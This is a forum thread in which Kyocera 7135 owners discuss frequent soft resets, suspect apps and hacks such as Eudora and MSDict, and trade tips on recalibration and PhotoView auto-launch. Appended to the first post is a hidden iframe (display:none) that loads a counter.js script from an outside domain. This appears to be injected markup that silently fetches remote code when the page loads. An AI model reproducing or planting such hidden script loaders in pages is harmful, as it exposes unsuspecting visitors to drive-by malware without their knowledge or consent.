+ Reply to Thread

why so many soft resets?

I seem to have at least one soft reset per day with my Kyo 7135. I LOVE the phone but have never had this before with previous Palm OS devices.

I can't really detect a pattern but I suspect that most of these instances happen after working with an application like a PQA, Snapper email, or Office Premier.

So far, I have simply had to go through the stylus recalibration and everything returns to normal.

Do others have this problem? Advice?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Don't panic.

I got a number of soft resets (every 2-3 days) during the first month with my pre-VZW phone but after that, I'd not seen any resets for weeks. I got NO hard resets. The same thing is happening with my newer VZW phone. I'm getting a reset every 2-3 days while I'm trying out new stuff. I got one hard reset so far (almost one month now). I am surprised that I'm getting any resets since the pre-VZW phone had become stable.

I've had my phone for one week and today was the first time that I had to do a soft reset. I left the phone alone for the first few days just to see if it was stable. Now I'm begining to question the one hack that I added in. When I don't 'reinstall' it, I have no problem, but I can't get the phone to work with the hack installed.

rr

msneider:
    You can check a box that says "don't do this again" so that you don't have to go through the stylus recalibration every time there is a soft reset. If I have a soft reset, I go straight to the "do you want to reactivate your hacks?" screen.

roadrunner:
    What is the hack that is giving you trouble?
    ---------------
    The same thing we do every night, Pinky...

what about Eudora ?

I have also had a lot of resets, I belive most of them have come when running the Eudora program that came with the 7135. Has anyone else had such trouble ? Anyone tried to find a newer version ?

Tom
    Tom Bishop

BrerLapn Said:
    You can check a box that says "don't do this again" so that you don't have to go through the stylus recalibration every time there is a soft reset.
    Where is this box?

It is at the end of the recalibration procedure. You know where you have to click on "done"? Instead just click on "Don't show this again". You have to do a soft reset to see it.

Hope this helps,

Byrd Dog
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

Thankyou!!!!

Can someone explain what a 'hack' is?

Is it simply referring to third-paryt software applications, or something more complicated (less stable) than that?

I have also had more soft resets since trying out Eudora's mail program.

Is there a way to get the automatic recalibration back? As someone noted in another thread, it's good to be sure that you can't get stuck with a bad calibration. (I know you can get it from the Prefs or Welcome apps, but I'd like it after a soft reset... perhaps it's just masochistic)

Somehow, without asking, the Palm no longer brings me to the recalibration screen after a soft reset. Instead, it gives me the Hackmaster prompt about reloading hacks, and then for an unknown reason, it starts the PhotoView program. Any idea why?

jeh
    Originally posted by Beryl
    I got a number of soft resets (every 2-3 days) during the first month with my pre-VZW phone but after that, I'd not seen any resets for weeks.
    I had the opposite experience. I had one reset the first week. Then the rate kept increasing. Over the last few days it was one per day.

BrerLapn: The hack that freezes my phone is MSDict. It creates a hook that allows to dictionary to be active in other programs.

rr

Originally posted by Chreotho
    I have also had more soft resets since trying out Eudora's mail program.

Is there a way to get the automatic recalibration back? As someone noted in another thread, it's good to be sure that you can't get stuck with a bad calibration. (I know you can get it from the Prefs or Welcome apps, but I'd like it after a soft reset... perhaps it's just masochistic)

Somehow, without asking, the Palm no longer brings me to the recalibration screen after a soft reset. Instead, it gives me the Hackmaster prompt about reloading hacks, and then for an unknown reason, it starts the PhotoView program. Any idea why?
    I can get my Welcome to appear upon reset by running Welcome, then tapping "Done" when calibration is done, instead of "don't show again."

Also, photo view is running because your SD card has a toplevel folder called DCIM. I got annoyed and renamed it to DCIM_.

Is there a way to get the 7135 to reset itself when it comes up with an error or hangs?

Originally posted by slorandy
    Is there a way to get the 7135 to reset itself when it comes up with an error or hangs?
    I doubt it. This would be a function of the Palm OS... A lot of these RSODs and BSODs don't seem to be handled properly for some reason. And if they're not handled (ie a dialog popping up displaying a message), the OS can't do a thing about it.

Back to my original question, does anyone have practical tips for reducing or eliminating the soft resets?